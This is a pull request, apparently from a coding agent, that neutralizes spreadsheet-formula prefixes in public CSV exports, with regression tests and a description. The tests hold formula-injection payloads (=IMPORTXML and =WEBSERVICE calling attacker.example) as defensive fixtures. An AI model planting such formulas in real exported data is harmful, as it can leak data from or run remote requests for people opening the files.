### PR TITLE
Neutralize spreadsheet-formula prefixes in public CSV exports

### DIFF
--- a/scripts/__tests__/csv-helpers.test.ts
+++ b/scripts/__tests__/csv-helpers.test.ts
@@ -1,0 +1,25 @@
+import { describe, expect, it } from "vitest";
+
+import { escapeCsvField } from "../lib/csv-helpers";
+
+describe("csv-helpers", () => {
+  it("neutralizes spreadsheet formula prefixes for string cells", () => {
+    expect(escapeCsvField("=IMPORTXML(\"https://attacker.example\",\"//x\")")).toBe(
+      "\"'=IMPORTXML(\"\"https://attacker.example\"\",\"\"//x\"\")\"",
+    );
+    expect(escapeCsvField("+SUM(1,1)")).toBe("\"'+SUM(1,1)\"");
+    expect(escapeCsvField("-1+2")).toBe("'-1+2");
+    expect(escapeCsvField("@SUM(1+1)")).toBe("'@SUM(1+1)");
+    expect(escapeCsvField("\t=WEBSERVICE(\"https://attacker.example\")")).toBe(
+      "\"'\t=WEBSERVICE(\"\"https://attacker.example\"\")\"",
+    );
+    expect(escapeCsvField("\r=WEBSERVICE(\"https://attacker.example\")")).toBe(
+      "\"'\r=WEBSERVICE(\"\"https://attacker.example\"\")\"",
+    );
+  });
+
+  it("keeps numeric values numeric while escaping CSV delimiters", () => {
+    expect(escapeCsvField(-1)).toBe("-1");
+    expect(escapeCsvField("plain,text")).toBe('"plain,text"');
+  });
+});

--- a/scripts/lib/csv-helpers.ts
+++ b/scripts/lib/csv-helpers.ts
@@ -12,8 +12,16 @@ export interface CsvColumn<T> {
   accessor: (row: T) => string | number | null;
 }
 
+const SPREADSHEET_FORMULA_PREFIXES = /^[=+\-@\t\r]/;
+
+function neutralizeSpreadsheetFormula(value: string): string {
+  return SPREADSHEET_FORMULA_PREFIXES.test(value) ? `'${value}` : value;
+}
+
 export function escapeCsvField(value: string | number | null | undefined): string {
   if (value === null || value === undefined) return "";
-  const str = String(value);
-  return str.includes(",") || str.includes('"') || str.includes("\n") ? `"${str.replace(/"/g, '""')}"` : str;
+  const str = typeof value === "string" ? neutralizeSpreadsheetFormula(value) : String(value);
+  return str.includes(",") || str.includes('"') || str.includes("\n") || str.includes("\r")
+    ? `"${str.replace(/"/g, '""')}"`
+    : str;
 }


### PR DESCRIPTION
### Motivation
- Public `/datasets/*` and `/sheets/*.csv` artifacts are consumed directly by spreadsheet clients and were being generated with only CSV delimiter/quote escaping, allowing attacker-controlled text beginning with `=`, `+`, `-`, `@`, tab, or CR to be interpreted as spreadsheet formulas. 
- The change prevents remote formula execution / data-exfiltration risks when analysts import or open the generated CSVs by treating provider-derived text as untrusted input.

### Description
- Update `scripts/lib/csv-helpers.ts` to detect spreadsheet formula-leading characters with `SPREADSHEET_FORMULA_PREFIXES` and prefix string cells with a single quote (`'`) before normal CSV escaping, while preserving numeric values. 
- Ensure CR (`\r`) is considered for quoting and that existing quote/CSV-delimiter handling remains intact. 
- Add regression tests at `scripts/__tests__/csv-helpers.test.ts` covering `=`, `+`, `-`, `@`, tab, carriage-return prefixes and normal delimiter escaping. 
- This change is limited to the server-side CSV helper used by the public dataset generator so all dataset and sheets CSV outputs inherit the mitigation.

### Testing
- Ran `npx vitest run scripts/__tests__/csv-helpers.test.ts scripts/__tests__/generate-public-datasets.test.ts`, and the test suite passed. 
- Ran the generator check with `npx tsx scripts/maintenance/generate-public-datasets.ts --check`, which completed with `Public dataset mirrors are current`. 
- Attempting `npm run check:public-datasets` failed due to the project not defining that npm script, which is unrelated to the fix itself.

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_6a3509b1024083329698f6d245b71ae1)